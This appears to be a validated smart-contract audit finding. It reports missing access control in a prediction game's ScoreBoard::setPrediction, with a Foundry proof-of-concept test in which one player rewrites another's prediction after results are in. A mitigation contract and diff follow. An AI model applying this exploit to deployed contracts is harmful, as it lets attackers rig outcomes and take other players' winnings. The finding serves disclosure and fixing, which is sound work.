Submission Details
Severity: high
Valid

Malicious player can change other players' predictions even after the result is in

Description:

Lack of access control in ScoreBoard::setPrediction allows a malicious player to change other players' predictions even after the result is in.

Impact:

A malicious player can make themselves the winner of the game by overwriting other players' correct predictions so that they lose. The same call can also be used to rewrite the malicious player's own predictions after the result is known, making them correct.

Proof of Concept:

Insert the following test into ThePredicter.test.sol:

```solidity
// Uses the existing fixtures of ThePredicter.test.sol: thePredicter, scoreBoard,
// organizer and stranger.
function test_maliciousPlayerCanSetOtherPlayersResult() public {
    address maliciousPlayer = makeAddr("maliciousPlayer");
    vm.deal(stranger, 0.0002 ether);
    vm.deal(maliciousPlayer, 0.0002 ether);
    vm.warp(2);

    // stranger makes a (correct) prediction for match 0 through ThePredicter
    vm.startPrank(stranger);
    thePredicter.makePrediction{value: 0.0001 ether}(0, ScoreBoard.Result.First);
    vm.stopPrank();

    // the organizer publishes the result of match 0
    vm.startPrank(organizer);
    scoreBoard.setResult(0, ScoreBoard.Result.First);
    vm.stopPrank();

    // Malicious player sets the incorrect result directly on ScoreBoard,
    // changing the score for stranger from 2 to -1
    vm.prank(maliciousPlayer);
    scoreBoard.setPrediction(address(stranger), 0, ScoreBoard.Result.Draw);
    assertEq(scoreBoard.getPlayerScore(stranger), -1);
}
```

Recommended Mitigation:

Make the ScoreBoard::setPrediction function callable only from ThePredicter::makePrediction, which sets a prediction only for the player calling it (msg.sender), so no caller can write another player's prediction.

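A reduced ScoreBoard/ThePredicter pair showing the recommended access control end to end, added here as an example and not taken from the contest code; the storage layout, the one-time setThePredicter wiring, and the enum values other than First and Draw are assumptions for this illustration.

```solidity
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.20;

// Illustrative example, not the contest code. Storage layout, the one-time
// wiring and enum values other than First/Draw are assumed.
contract ScoreBoard {
    enum Result { Pending, First, Draw, Second }

    address public immutable owner;   // deployer, allowed to wire ThePredicter once
    address public thePredicter;      // the only caller allowed to write predictions
    mapping(address => mapping(uint256 => Result)) public predictions;

    error NotThePredicter();
    error WiringNotAllowed();

    constructor() { owner = msg.sender; }

    // The mitigation: every caller other than the ThePredicter contract is rejected,
    // so an EOA such as maliciousPlayer in the PoC can no longer call setPrediction.
    modifier onlyThePredicter() {
        if (msg.sender != thePredicter) revert NotThePredicter();
        _;
    }

    // One-time wiring; once set, nobody (owner included) can redirect it.
    function setThePredicter(address _thePredicter) external {
        if (msg.sender != owner || thePredicter != address(0)) revert WiringNotAllowed();
        thePredicter = _thePredicter;
    }

    function setPrediction(address player, uint256 matchNumber, Result result)
        external
        onlyThePredicter
    {
        predictions[player][matchNumber] = result;
    }
}

contract ThePredicter {
    ScoreBoard public immutable scoreBoard;

    constructor(ScoreBoard _scoreBoard) { scoreBoard = _scoreBoard; }

    // The only path to setPrediction. The player is hard-coded to msg.sender, so a
    // caller can only ever change their own prediction. Fee and prediction-deadline
    // checks of the real contract are omitted here.
    function makePrediction(uint256 matchNumber, ScoreBoard.Result result) external payable {
        scoreBoard.setPrediction(msg.sender, matchNumber, result);
    }
}
```

Deployment order is ScoreBoard first, then ThePredicter with the ScoreBoard address, then one call to setThePredicter from the deployer; after that the PoC's direct call reverts with NotThePredicter.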
- function setPrediction(address player, uint256 matchNumber, Result result) public {
+ function setPrediction(address player, uint256 matchNumber, Result result) public onlyThePredicter {
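Review bot: the `onlyThePredicter` modifier added on the `+` line is not defined anywhere in the hunk, and ScoreBoard needs a stored ThePredicter address for such a modifier to compare `msg.sender` against; include the modifier body (revert unless `msg.sender == thePredicter`) and the constructor or one-time setter that records that address, otherwise the patched contract does not compile. The hunk also lacks an `@@` header and file path, so it is unclear where in ScoreBoard.sol the change lands.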

Updates

Lead Judging Commences

NightHawK Lead Judge 11 months ago
Submission Judgement Published
Validated
Assigned finding tags:

setPrediction lacks access control

setPrediction has no access control and allows manipulation of players' predictions.
